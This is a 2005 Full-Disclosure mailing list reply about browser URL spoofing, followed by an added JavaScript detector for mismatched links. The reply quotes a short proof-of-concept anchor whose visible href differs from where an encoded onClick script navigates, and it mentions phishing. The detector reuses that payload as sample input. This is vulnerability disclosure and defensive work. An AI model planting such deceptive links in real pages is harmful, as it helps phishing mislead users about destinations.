Full Disclosure mailing list archives
Re: New (19.10.05) MS-IE Url Spoofing bug (byK-Gen)
From: Bipin Gautam <gautam.bipin () gmail com>
Date: Sat, 22 Oct 2005 00:06:28 +0545
On 10/21/05, Jake Cole <jakecoleus () yahoo com> wrote:
In "Billy's" defense, this is expected in most JavaScript-enabled browsers. Here's a Firefox version:

<a href="http://microsoft.com" onClick="window.setTimeout('document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\'))')">Microsoft</a>
I really don't know what to EXACTLY call it... yep, it can be used in PHISHING; because a few weeks back I was thinking this EXACT same thing. GOT the idea from 'http://vmyths.com/'; there is a page (news page I guess) there, it's sectioned and two different websites are displayed. (O;

--
Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is possibility of direct, indirect or consequential communication between the two...
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
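The link quoted in the message above shows one host in its href while its onClick handler navigates to another. As an added example (not part of the original thread), this JavaScript check flags that mismatch in a page's markup; the function names are hypothetical and the check is a heuristic that only sees URLs written literally or percent-encoded inside the handler.

```javascript
// Added example: static check for links whose href and onclick targets differ.
// Heuristic only: it sees URLs written literally (or percent-encoded) in the handler.

// Undo %XX encoding repeatedly, since a payload may be encoded more than once.
function deepDecode(s, maxRounds = 5) {
  for (let i = 0; i < maxRounds; i++) {
    const next = s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
    if (next === s) break;
    s = next;
  }
  return s;
}

// Hostname of an absolute URL, or null for relative or unparsable input.
function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return null; }
}

// One finding per <a> whose inline onclick mentions a URL on a host other than href's.
function findMismatchedLinks(html) {
  const tagRe = /<a\b((?:\s+[\w-]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*>/gi;
  const attrRe = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  const findings = [];
  for (const tag of html.matchAll(tagRe)) {
    const attrs = {};
    for (const a of tag[1].matchAll(attrRe)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    const hrefHost = hostOf(attrs.href || "");
    if (!hrefHost || !attrs.onclick) continue; // relative href or no handler: nothing to compare
    const urls = deepDecode(attrs.onclick).match(/https?:\/\/[^\s'"<>\\)]+/gi) || [];
    const others = [...new Set(urls.map(hostOf).filter(h => h && h !== hrefHost))];
    if (others.length) findings.push({ href: attrs.href, handlerHosts: others });
  }
  return findings;
}

// Constructed input: the link quoted in the message above plus a benign link.
const SAMPLE = String.raw`<a href="http://microsoft.com" onClick="window.setTimeout('document.write(unescape(\'%3cscript%3ewindow.location=%27http://google.com%27%3c/script%3e\'))')">Microsoft</a>
<a href="http://example.com/a" onclick="track('http://example.com/click')">ok</a>`;

console.log(findMismatchedLinks(SAMPLE));
```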
